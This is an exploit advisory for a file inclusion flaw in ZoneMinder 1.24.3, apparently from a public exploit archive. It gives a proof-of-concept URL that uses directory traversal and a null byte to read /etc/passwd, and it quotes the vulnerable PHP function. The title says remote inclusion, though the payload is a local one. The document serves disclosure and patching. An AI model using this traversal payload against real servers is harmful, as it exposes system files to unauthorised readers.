# Exploit Title: Zoneminder 1.24.3 Remote File Inclusion Vulnerability
# Date: 2011-07-22
# Author: Iye (iye[dot]cba-at-gmail[dot]com)
# Software Link: http://www.zoneminder.com/
# Version: 1.24.3 (Tested). 1.24.4 probably too, not tested
# Tested on: Ubuntu 10.04
 
You must be authenticated as a user in the Web App to exploit it. It's
not a must to be admin.
 
POC: http://localhost/zm/index.php?action=56&markMids%5B%5D=1&deleteBtn=Delete&editBtn=Edit&view=../../../../../../../../../../../../../../../etc/passwd%00
 
Reported to proyect mantainer (Philip Coombes) on 2011-07-22
Fix patch made Philip Coombes: http://www.zoneminder.com/downloads/lfi-patch.txt
 
Vulnerable Code:
 
/var/www/zm/includes/functions.php
--------------------------------------------------------
 
function getSkinFile( $file )
{
    global $skinBase;
    $skinFile = false;
    foreach ( $skinBase as $skin )
    {
        $tempSkinFile = 'skins'.'/'.$skin.'/'.$file;
        if ( file_exists( $tempSkinFile ) )
            $skinFile = $tempSkinFile;
    }
    return( $skinFile );
}
 
--------------------------------------------------------